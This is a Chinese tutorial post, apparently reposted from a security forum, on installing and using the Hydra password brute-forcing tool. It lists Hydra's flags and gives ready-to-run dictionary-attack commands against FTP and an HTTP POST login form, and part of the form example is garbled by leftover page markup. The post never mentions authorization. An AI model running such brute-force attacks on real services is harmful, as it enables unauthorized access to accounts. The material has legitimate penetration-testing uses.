linux下破解工具 hydra使用小记







本文转自t00ls

下载链接:http://www.thc.org/download.php?t=r&f=hydra-7.0-src.tar.gz

一、介绍(简译自官方)

hydra著名黑客组织thc的一款开源的暴力破解工具,可以破解多种密码。
其官网http://www.thc.org,可支持
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL,
REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP,
NNTP, PCNFS,ICQ, SAP/R3……等密码破解。

二、安装

su root
tar zxvf hydra-7.0-src.tar.gz
cd hydra-7.0-src
./configure
make
make install
另外,该软件支持GUI

三、参数

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度破解
-S 采用SSL链接
-s PORT 可通过这个参数指定非默认端口
-l LOGIN 指定破解的用户
-L FILE 指定用户名字典
-p PASS 指定密码破解
-P FILE 指定密码字典
-e ns 可选选项,n:空密码试探,s:使用指定账户和密码试探
-C FILE 使用冒号分割格式 例如 “登录名:密码”来代替-L/-P参数
-M FILE 指定目标列表文件一行一条
-o FILE 指定结果输出文件
-f 在使用-M参数以后 找到第一对登录名或者密码的时候中止破解
-t TASKS 同时运行的线程数,默认为16
-w TIME 设置最大超时的时间,单位秒,默认是30s
-v / -V 显示详细过程
server 目标ip
service 指定服务名,支持: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form 等等
OPT 可选项

四、实例
1.ftp password crack

hydra -L /tmp/ftpuser.lst -P /tmp/ftppwd.lst 10.10.1* ftp
hydra -l admin -P /tmp/ftppwd.lst -v 10.10.1.6 ftp

破解成功,直接显示结果,也可以通过参数-o让他输出到文件

2.Guessing password attack
登录表单(无验证码):` <div id="highlighter_396653"> <div> <div>[预览源代码](#viewSource "预览源代码")[打印](#printSource "打印")[关于](#about "关于") </div> </div> <div> <div> <table> <tbody> <tr> <td>1</td> <td><form` `action="login.php"` `method="POST"> </td> </tr> </tbody> </table> </div> <div> <table> <tbody> <tr> <td>2</td> <td><input` `type="text"` `name="id"` `/&gt; `</td> </tr> </tbody> </table> </div> <div> <table> <tbody> <tr> <td>`3`</td> <td>`&lt;input`type``=``"password" name``=``"passwd" /&gt;










4&lt;``input type``=``"submit" name``=``"OK" value``=``"submit"``&gt;










5&lt;/``form``&gt;




执行命令:
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.10.1.6 http-post-form “login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>”
(参数说明:-t 同时线程数3,-l 用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.10.1.6目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。PS:注意彩色标记部分与表单对应。)

五、小结
此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果。更多小记期待大家共享。